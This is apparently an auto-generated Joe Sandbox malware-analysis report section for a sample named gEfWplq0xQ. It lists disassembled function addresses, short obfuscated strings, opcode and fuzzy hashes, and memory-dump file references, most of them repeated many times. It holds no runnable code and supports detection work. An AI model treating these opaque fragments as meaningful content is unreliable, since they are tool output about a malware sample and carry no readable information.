Associated: 00000000.00000002.2195399869.00000000005C2000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2195420530.00000000005C4000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2195420530.000000000074C000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2195420530.0000000000828000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2195420530.000000000084F000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2195420530.0000000000858000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2195420530.0000000000866000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2195758962.0000000000867000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2195900881.0000000000A00000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2195918409.0000000000A01000.00000080.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_570000_gEfWplq0xQ.jbxd

Similarity

API ID:
String ID: #f!x$$%$%y$)Z*\$)Z/\$-^+P$5F6X$6T$7$8JL$:JL$<[5]$=_%A$>N@$?z=|$A/6Q$VaUc$o#M%$pIrK
API String ID: 0-2905094782
Opcode ID: 54e0ac803ba42c96d831152984362c4106b8583fac86f1ad674dd1c1d63f4580
Instruction ID: 91f71be31f84b612b59610c5355a861e722a4f01d4df7ad29e344124d93c5c5b
Opcode Fuzzy Hash: 54e0ac803ba42c96d831152984362c4106b8583fac86f1ad674dd1c1d63f4580
Instruction Fuzzy Hash: 5D9295B59052298BDF64CF59DC887EEBBB1FB85300F2082E8D4596B351DB745A86CF80

Function 00594380 Relevance: 23.4, Strings: 18, Instructions: 948COMMON

Download Yara Rule

Strings

:JL, xrefs: 00594BF5
)Z*\, xrefs: 00594828
#f!x, xrefs: 00594BC3
pIrK, xrefs: 00594560
6T, xrefs: 00594D0A
o#M%, xrefs: 005948C6
7, xrefs: 00594D00
-^+P, xrefs: 00594832
VaUc, xrefs: 0059459C
8JL, xrefs: 00594800
5F6X, xrefs: 00594C13
=_%A, xrefs: 0059490C
?z=|, xrefs: 005947D8
<[5], xrefs: 00594902
)Z/\, xrefs: 00594C1D
A/6Q, xrefs: 005948E4
%y, xrefs: 00594D14
>N@, xrefs: 0059480A

Memory Dump Source

Source File: 00000000.00000002.2195343692.0000000000571000.00000040.00000001.01000000.00000003.sdmp, Offset: 00570000, based on PE: true

Associated: 00000000.00000002.2195321997.0000000000570000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2195343692.00000000005B3000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2195399869.00000000005C2000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2195420530.00000000005C4000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2195420530.000000000074C000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2195420530.0000000000828000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2195420530.000000000084F000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2195420530.0000000000858000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2195420530.0000000000866000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2195758962.0000000000867000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2195900881.0000000000A00000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2195918409.0000000000A01000.00000080.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_570000_gEfWplq0xQ.jbxd

Similarity

API ID:
String ID: #f!x$%y$)Z*\$)Z/\$-^+P$5F6X$6T$7$8JL$:JL$<[5]$=_%A$>N@$?z=|$A/6Q$VaUc$o#M%$pIrK
API String ID: 0-3225404442
Opcode ID: eee317e55258b3159c52d2f234defc7fa13d00d4ef4adc410a285a9591628047
Instruction ID: 859d7d63d27659a45d05f267adaeccca57475cfec673d0186f08582d5a4aa495
Opcode Fuzzy Hash: eee317e55258b3159c52d2f234defc7fa13d00d4ef4adc410a285a9591628047
Instruction Fuzzy Hash: 2792A6B5905229CBDF65CF59D8887EEBB71FB94300F2082E8D4596B350DB745A86CF80

Function 005791B0 Relevance: 15.4, Strings: 12, Instructions: 368COMMON

Download Yara Rule

Strings

!+2j, xrefs: 005791C9
vm/;, xrefs: 005791D9
$01;, xrefs: 005791E1
>7;<, xrefs: 005791F9
", xrefs: 0057931D
w!w4, xrefs: 005791F1
gn~b, xrefs: 0057927C
(7.A, xrefs: 005792DC
bblg, xrefs: 0057928C
908#, xrefs: 005791E9
ne, xrefs: 00579209
O35 , xrefs: 00579240

Memory Dump Source

Source File: 00000000.00000002.2195343692.0000000000571000.00000040.00000001.01000000.00000003.sdmp, Offset: 00570000, based on PE: true

Associated: 00000000.00000002.2195321997.0000000000570000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2195343692.00000000005B3000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2195399869.00000000005C2000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2195420530.00000000005C4000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2195420530.000000000074C000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2195420530.0000000000828000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2195420530.000000000084F000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2195420530.0000000000858000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2195420530.0000000000866000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2195758962.0000000000867000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2195900881.0000000000A00000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2195918409.0000000000A01000.00000080.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_570000_gEfWplq0xQ.jbxd

Similarity

API ID:
String ID: !+2j$"$$01;$(7.A$908#$>7;<$O35 $bblg$gn~b$ne$vm/;$w!w4
API String ID: 0-1290103930
Opcode ID: e76aa1fc780e58e750d1ae106741ee0e38235b05f912ede24168565961e5c466
Instruction ID: deace6e196c33bffa128cba0a9de08133ccdbf16f5958b485f9f093f5284ac9a
Opcode Fuzzy Hash: e76aa1fc780e58e750d1ae106741ee0e38235b05f912ede24168565961e5c466
Instruction Fuzzy Hash: F3A1D57024C3D18BC316CF6994A076BBFE1BF97314F588A6CE4D54B282D339890AD762

Function 00648415 Relevance: 8.1, Strings: 6, Instructions: 571COMMON

Download Yara Rule

Strings

w, xrefs: 006486A5
/, xrefs: 006485AB
Q, xrefs: 00648B87
f, xrefs: 00648A98
a, xrefs: 00648A36
!, xrefs: 00648851

Memory Dump Source

Source File: 00000000.00000002.2195420530.00000000005C4000.00000040.00000001.01000000.00000003.sdmp, Offset: 00570000, based on PE: true

Associated: 00000000.00000002.2195321997.0000000000570000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2195343692.0000000000571000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2195343692.00000000005B3000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2195399869.00000000005C2000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2195420530.000000000074C000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2195420530.0000000000828000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2195420530.000000000084F000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2195420530.0000000000858000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2195420530.0000000000866000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2195758962.0000000000867000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2195900881.0000000000A00000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2195918409.0000000000A01000.00000080.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_570000_gEfWplq0xQ.jbxd

Similarity

API ID:
String ID: !$/$Q$a$f$w
API String ID: 0-2870547091
Opcode ID: 9e22ff1265b174e4bc8e016e16b658637c727bcb2943708660a0e87fe2f24b39
Instruction ID: 00365229800ff2c5fce7a75ae5046862134c6ab6114437faad0e8ff99fb98978
Opcode Fuzzy Hash: 9e22ff1265b174e4bc8e016e16b658637c727bcb2943708660a0e87fe2f24b39
Instruction Fuzzy Hash: 22127DB3F216254BF7584838CD693B6158393E5320F2F82798B5A5B7C6DCBE4C8A4384

Function 006484E7 Relevance: 7.9, Strings: 6, Instructions: 426COMMON

Download Yara Rule

Strings

w, xrefs: 006486A5
/, xrefs: 006485AB
Q, xrefs: 00648B87
f, xrefs: 00648A98
a, xrefs: 00648A36
!, xrefs: 00648851

Memory Dump Source

Source File: 00000000.00000002.2195420530.00000000005C4000.00000040.00000001.01000000.00000003.sdmp, Offset: 00570000, based on PE: true

Associated: 00000000.00000002.2195321997.0000000000570000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2195343692.0000000000571000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2195343692.00000000005B3000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2195399869.00000000005C2000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2195420530.000000000074C000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2195420530.0000000000828000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2195420530.000000000084F000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2195420530.0000000000858000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2195420530.0000000000866000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2195758962.0000000000867000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2195900881.0000000000A00000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2195918409.0000000000A01000.00000080.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_570000_gEfWplq0xQ.jbxd

Similarity

API ID:
String ID: !$/$Q$a$f$w
API String ID: 0-2870547091
Opcode ID: f75843eb86d6da43dabd15f6e8256a263873523fe161832ffc7de37552246a14
Instruction ID: 5494f07cc4f2c224e03b9e0fa48b6fe8ce2ee9c390a6f3a41accb1aac5c72000
Opcode Fuzzy Hash: f75843eb86d6da43dabd15f6e8256a263873523fe161832ffc7de37552246a14
Instruction Fuzzy Hash: 1BE18EB3F219550BF7580438CD693F9198393E5320E2F827D8B5A5B7C6DCBE898A4385

Function 00736444 Relevance: 7.9, Strings: 5, Instructions: 1641COMMON

Download Yara Rule

Strings

S}, xrefs: 00737817
QN', xrefs: 0073688A
pj, xrefs: 00737216
056m, xrefs: 00736BA5
aV:, xrefs: 00736F8F

Memory Dump Source

Source File: 00000000.00000002.2195420530.00000000005C4000.00000040.00000001.01000000.00000003.sdmp, Offset: 00570000, based on PE: true

Associated: 00000000.00000002.2195321997.0000000000570000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2195343692.0000000000571000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2195343692.00000000005B3000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2195399869.00000000005C2000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2195420530.000000000074C000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2195420530.0000000000828000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2195420530.000000000084F000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2195420530.0000000000858000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2195420530.0000000000866000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2195758962.0000000000867000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2195900881.0000000000A00000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2195918409.0000000000A01000.00000080.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_570000_gEfWplq0xQ.jbxd

Similarity

API ID:
String ID: S}$056m$QN'$aV:$pj
API String ID: 0-3364383712
Opcode ID: 3759469cd07eae4a96d1aea439652c335fd1309a1a42397f0afeb5848ed38ddd
Instruction ID: 25ef5d2aa5a7724c062850efc167da3add273da7b0114f5d3be4748b7bd6fcc6
Opcode Fuzzy Hash: 3759469cd07eae4a96d1aea439652c335fd1309a1a42397f0afeb5848ed38ddd
Instruction Fuzzy Hash: 57B2D6F360C2009FE308AE2DEC8567AB7E5EF94720F1A893DE6C5C3744E63598458697

Function 0058D380 Relevance: 4.2, Strings: 3, Instructions: 453COMMON

Download Yara Rule

Strings

|F, xrefs: 0058D40A
C], xrefs: 0058D471
34, xrefs: 0058D46A

Memory Dump Source

Source File: 00000000.00000002.2195343692.0000000000571000.00000040.00000001.01000000.00000003.sdmp, Offset: 00570000, based on PE: true

Associated: 00000000.00000002.2195321997.0000000000570000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2195343692.00000000005B3000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2195399869.00000000005C2000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2195420530.00000000005C4000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2195420530.000000000074C000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2195420530.0000000000828000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2195420530.000000000084F000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2195420530.0000000000858000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2195420530.0000000000866000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2195758962.0000000000867000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2195900881.0000000000A00000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2195918409.0000000000A01000.00000080.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_570000_gEfWplq0xQ.jbxd

Similarity

API ID:
String ID: 34$C]$|F
API String ID: 0-2804560523
Opcode ID: 5bf1c22850875fd557483ddd22faa48a4dda618aa16c45eda3a696379cdb0c51
Instruction ID: 6349e5262c186c31cd4917c9ea83499ea9cfbb6ebc6ed230cddce7715eaa7317
Opcode Fuzzy Hash: 5bf1c22850875fd557483ddd22faa48a4dda618aa16c45eda3a696379cdb0c51
Instruction Fuzzy Hash: 34C110B59183118BC720DF28C88166BBBF2FFD5314F58895CE8D59B390EB74A905C7A2

Function 0058B2E0 Relevance: 4.0, Strings: 3, Instructions: 231COMMON

Download Yara Rule

Strings

/pqr, xrefs: 0058B30E
_, xrefs: 0058B428
+|-~, xrefs: 0058B306

Memory Dump Source

Source File: 00000000.00000002.2195343692.0000000000571000.00000040.00000001.01000000.00000003.sdmp, Offset: 00570000, based on PE: true

Associated: 00000000.00000002.2195321997.0000000000570000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2195343692.00000000005B3000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2195399869.00000000005C2000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2195420530.00000000005C4000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2195420530.000000000074C000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2195420530.0000000000828000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2195420530.000000000084F000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2195420530.0000000000858000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2195420530.0000000000866000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2195758962.0000000000867000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2195900881.0000000000A00000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2195918409.0000000000A01000.00000080.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_570000_gEfWplq0xQ.jbxd

Similarity

API ID:
String ID: +|-~$/pqr$_
API String ID: 0-1379640984
Opcode ID: 79388e2e22ff98885fd7de17ef2449aa8662f13647f2a80de13e349fa80d01f4
Instruction ID: ded2da4547147b3a1228bda3796be4290e6cd19b0c742d16f8c095638d3f436a
Opcode Fuzzy Hash: 79388e2e22ff98885fd7de17ef2449aa8662f13647f2a80de13e349fa80d01f4
Instruction Fuzzy Hash: B681461661454106CB6CDF3588A733BAAE7DFC4308B29D1BEC966CFA96FD38C1028749

Function 006A455E Relevance: 3.0, Strings: 2, Instructions: 535COMMON

Download Yara Rule

Strings

e, xrefs: 006A4673
Aj}, xrefs: 006A4BCC

Memory Dump Source

Source File: 00000000.00000002.2195420530.00000000005C4000.00000040.00000001.01000000.00000003.sdmp, Offset: 00570000, based on PE: true

Associated: 00000000.00000002.2195321997.0000000000570000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2195343692.0000000000571000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2195343692.00000000005B3000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2195399869.00000000005C2000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2195420530.000000000074C000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2195420530.0000000000828000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2195420530.000000000084F000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2195420530.0000000000858000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2195420530.0000000000866000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2195758962.0000000000867000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2195900881.0000000000A00000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2195918409.0000000000A01000.00000080.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_570000_gEfWplq0xQ.jbxd

Similarity

API ID:
String ID: Aj}$e
API String ID: 0-2773950742
Opcode ID: b810f8e012a3a5bcdfb96f3b4972791e7791fed076fa65e92b2cba205e00130a
Instruction ID: 499eb4def305da7bb3ae7d746d1bf437f406ff92f2ccce9432124201ee3b73c9
Opcode Fuzzy Hash: b810f8e012a3a5bcdfb96f3b4972791e7791fed076fa65e92b2cba205e00130a
Instruction Fuzzy Hash: BE02F1F3F142108BF3449A39DD59366BAD2EBD0320F2B863C9A99977C8D97D8C064785

Function 005EC028 Relevance: 3.0, Strings: 2, Instructions: 503COMMON

Download Yara Rule

Strings

lIkp, xrefs: 005EC4DA
kMQ, xrefs: 005EC52B

Memory Dump Source

Source File: 00000000.00000002.2195420530.00000000005C4000.00000040.00000001.01000000.00000003.sdmp, Offset: 00570000, based on PE: true

Associated: 00000000.00000002.2195321997.0000000000570000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2195343692.0000000000571000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2195343692.00000000005B3000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2195399869.00000000005C2000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2195420530.000000000074C000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2195420530.0000000000828000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2195420530.000000000084F000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2195420530.0000000000858000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2195420530.0000000000866000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2195758962.0000000000867000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2195900881.0000000000A00000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2195918409.0000000000A01000.00000080.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_570000_gEfWplq0xQ.jbxd

Similarity

API ID:
String ID: kMQ$lIkp
API String ID: 0-172835293
Opcode ID: fc9e8bb30cf39c2f5433e617ff60c387750f3c643413fd00f488124e99fdbb79
Instruction ID: 449117b1a75e81d84f9ccb3de336e3d765632fad64aea6141e44fbc2de92185d
Opcode Fuzzy Hash: fc9e8bb30cf39c2f5433e617ff60c387750f3c643413fd00f488124e99fdbb79
Instruction Fuzzy Hash: 5102D0F3E142244BF3580E78CD99366BA92EB90320F1B823C8F99A77C5D97E5D094785

Function 0061A2A4 Relevance: 3.0, Strings: 2, Instructions: 503COMMON

Download Yara Rule

Strings

gw[, xrefs: 0061A951
Y%NA, xrefs: 0061A8F5

Memory Dump Source

Source File: 00000000.00000002.2195420530.00000000005C4000.00000040.00000001.01000000.00000003.sdmp, Offset: 00570000, based on PE: true

Associated: 00000000.00000002.2195321997.0000000000570000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2195343692.0000000000571000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2195343692.00000000005B3000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2195399869.00000000005C2000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2195420530.000000000074C000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2195420530.0000000000828000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2195420530.000000000084F000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2195420530.0000000000858000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2195420530.0000000000866000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2195758962.0000000000867000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2195900881.0000000000A00000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2195918409.0000000000A01000.00000080.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_570000_gEfWplq0xQ.jbxd

Similarity

API ID:
String ID: Y%NA$gw[
API String ID: 0-2729485982
Opcode ID: 812e0879b6e2d9fb1841cecedb6913f08c926165fd96373ca7600d50cd77c958
Instruction ID: ec44c7ab5be594b000f481a5b1169ebe3c604e288c14c4542375e863536e5b99
Opcode Fuzzy Hash: 812e0879b6e2d9fb1841cecedb6913f08c926165fd96373ca7600d50cd77c958
Instruction Fuzzy Hash: 58F1FEF3F152214BF3545928DC58366B696EBA1320F2F863DDE88A77C4D97E8C098381

Function 005931C2 Relevance: 2.9, Strings: 2, Instructions: 432COMMON

Download Yara Rule

Strings

R2Y, xrefs: 0059321B, 0059323E
6Y, xrefs: 005936D0

Memory Dump Source

Source File: 00000000.00000002.2195343692.0000000000571000.00000040.00000001.01000000.00000003.sdmp, Offset: 00570000, based on PE: true

Associated: 00000000.00000002.2195321997.0000000000570000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2195343692.00000000005B3000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2195399869.00000000005C2000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2195420530.00000000005C4000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2195420530.000000000074C000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2195420530.0000000000828000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2195420530.000000000084F000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2195420530.0000000000858000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2195420530.0000000000866000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2195758962.0000000000867000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2195900881.0000000000A00000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2195918409.0000000000A01000.00000080.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_570000_gEfWplq0xQ.jbxd

Similarity

API ID:
String ID: R2Y$6Y
API String ID: 0-4002273726
Opcode ID: 7bf042ff7c582db5d5258d7ecbe86d5ddcfa938b87d2ee3c1ba14a5a5116cbb2
Instruction ID: fc3447de03e5e812ac0b0f468a8cd468d40aa3f6e8788799bc30d227b796f95b
Opcode Fuzzy Hash: 7bf042ff7c582db5d5258d7ecbe86d5ddcfa938b87d2ee3c1ba14a5a5116cbb2
Instruction Fuzzy Hash: 3DD1E576A11116CFDB18CF68DC516AE7BB6FB99310F1A8668D841E7392DB30AC04DF50

Function 00574320 Relevance: 2.8, Strings: 2, Instructions: 329COMMON

Download Yara Rule

Strings

IEND, xrefs: 00574711
), xrefs: 0057439B

Memory Dump Source

Source File: 00000000.00000002.2195343692.0000000000571000.00000040.00000001.01000000.00000003.sdmp, Offset: 00570000, based on PE: true

Associated: 00000000.00000002.2195321997.0000000000570000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2195343692.00000000005B3000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2195399869.00000000005C2000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2195420530.00000000005C4000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2195420530.000000000074C000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2195420530.0000000000828000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2195420530.000000000084F000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2195420530.0000000000858000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2195420530.0000000000866000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2195758962.0000000000867000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2195900881.0000000000A00000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2195918409.0000000000A01000.00000080.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_570000_gEfWplq0xQ.jbxd

Similarity

API ID:
String ID: )$IEND
API String ID: 0-707183367
Opcode ID: 270b93f18172cd923420c504e8895457c8252fe8371c6c3ef43c9a45d40eb987
Instruction ID: b25da8a13226b18136fcfa18e3b380974bbb65f158537a7323ec6cf6bcf4a29f
Opcode Fuzzy Hash: 270b93f18172cd923420c504e8895457c8252fe8371c6c3ef43c9a45d40eb987
Instruction Fuzzy Hash: 79D19BB15083459FE720CF18E849B5ABBE4BB94304F14892DF99C9B382D775E908DF92

Function 006B2257 Relevance: 2.7, Strings: 2, Instructions: 216COMMON

Download Yara Rule

Strings

5n.;, xrefs: 006B23CC
{x[, xrefs: 006B2420

Memory Dump Source

Source File: 00000000.00000002.2195420530.00000000005C4000.00000040.00000001.01000000.00000003.sdmp, Offset: 00570000, based on PE: true

Associated: 00000000.00000002.2195321997.0000000000570000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2195343692.0000000000571000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2195343692.00000000005B3000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2195399869.00000000005C2000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2195420530.000000000074C000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2195420530.0000000000828000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2195420530.000000000084F000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2195420530.0000000000858000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2195420530.0000000000866000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2195758962.0000000000867000.00000080.00000001.01000000.00000003.sdmpDownload File
